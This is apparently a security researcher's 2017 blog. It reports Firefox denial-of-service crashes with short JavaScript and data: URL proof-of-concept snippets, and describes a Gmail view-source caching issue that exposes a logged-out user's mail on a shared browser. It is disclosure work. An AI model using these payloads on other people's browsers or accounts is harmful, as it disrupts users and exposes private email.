Pageviews

Friday, 27 January 2017

Denial of service attack Mozilla.

DOS Mozilla ......

Sets to reproduce :

1. Create an html file for the below code.

Code :

"<script>document.write("\u0000\u0001\u0002\u0003\u0004\u0005")</script>
<script>
var i=0;
for (i=0;i<=19999;i++)
{
    document.write("a");
}

for (i=0;i<=3;i++)
{
    document.write(document.body.innerHTML);
}
</script>"

2. Open that file in Mozilla and try using mozilla.

This happens because of InnerLoop of Mozilla gets crashed.

Disclose by : Dhiraj Mishra

Thursday, 26 January 2017

Mozilla crashes at IPC via infinite redirects with long URL's

To easy.....

Steps to reproduce :

Paste the below code to OminiBox.

"data:text/html,<script>document.location += document.location +
document.location</script>"

The browser stops responding,  this kind of looping string-doubling attack usually gets killed by our out-of-memory detection.

Priority: -- → P3
Bug Reported by : Dhiraj Mishra

Tuesday, 24 January 2017

Tracking Airplanes via RTL-SDR

#Happiness 
Started with Tracking of Airplanes, very basics of RTL-SDR.
I hope my study goes till GSM Network Sniffing.
P.S : Hardik Mehta 

Wednesday, 18 January 2017

Mozilla Crashes at Inner Loop.

Lets get it done ....

Steps to Reproduce :

1. Open this link in Mozilla
2. Wait for a while, Mozilla will stop Not-Responding.

This happens because of the code given below :

 "  document.designMode="on";
  for(var i=0;i<100000;i++){
    document.execCommand("selectall");
    document.execCommand("bold",false,null);
    document.execCommand("insertHtml",false,"A");
  }"

Looks like that "selectall" registers runnable events for "selectionchange" but the selection has been already changed "insertHTML" and/or others when the runnable events try to dispatch selectionchange events , then tab becomes unresponsive.

Bug Reported by : Dhiraj Mishra 

Mozilla crashes at OOM.

Lets DOS Mozilla ....

Mozilla Crashes at [@ OOM | large | NS_ABORT_OOM | nsAString_internal::Replace ]

Steps to Reproduce :

1. Open Mozilla any version any platform.
2. Just paste the below code in the ominibox.

"data:text/html,<script>document.location += document.location +
document.location</script>
"

The browser gets hung and generates a Crash ID , mine was this.
It happens because Mozilla goes safe out of memory crash and nsPlainTextSerializer::AddToLine is using infallible string allocation.  

Bug reported by : Dhiraj Mishra 

Tuesday, 17 January 2017

Browser caching may hideout your Gmail privacy.

Lets make it simple....

Steps to Reproduce :

1. Login to your Gmail Account from "Mozilla"
2. Perform any dynamic activity.
3. Log Out (Do not Close the browser)

Now, lets view the "view-source" of Gmail from Mozilla.

Visit : view-source:https://mail.google.com/mail/u/0/

If everything went perfect, you should be able to view all the recent mails which was send and receive for that logged in user.

However when we reported this to Google this is what they replied :

Google :
Hello,

We've investigated and determined that this is a caching bug in Firefox. Firefox uses the cached version of a page when viewing the source, and it appears that Firefox is not respecting the caching headers that Gmail is sending. This isn't reproducible on Chrome,
which reloads a page when viewing the source.
You should be able to file a bug with Firefox at Bugzilla.Mozilla.org.


Regards,
Michael, Google Security Team
==

and when reported to Mozilla they removed the security flag from the bug by saying "this is not remotely exploitable"

Then again reverted back to Google and this is what they said :

Google :
 Hey,

Thanks for the bug report.

We've investigated your submission and made the decision not to track it as a security bug. It will also not be accepted as part of our VRP. Only first reports of technical security vulnerabilities that substantially affect the confidentiality or integrity of our users' data are in scope, and unfortunately we feel the issue you mention does not meet that bar :(

In order to conduct the attack the evildoer needs to reuse the same local user account. Because the operating systems themselves do not protect against attackers with this level of access, any fix we could implement would be easy to bypass, and we don't want to offer a false sense of security to our users. Check out https://sites.google.com/site/bughunteruniversity/nonvuln/attacks-working-only-when-sharing-local-account-with-the-attacker where we have written about this case.

If you think we've misunderstood, please do let us know!
==

It is a simple bug, that can have significant consequences, but google simply said,Who cares ?
Where Mozilla is still working on this.
Note: This works on all OS and any versions of Mozilla in Mobile as well.

Video POC :




Bug reported by : Sebastian Gr├╝nwald, Dhiraj Mishra, Japz Divino.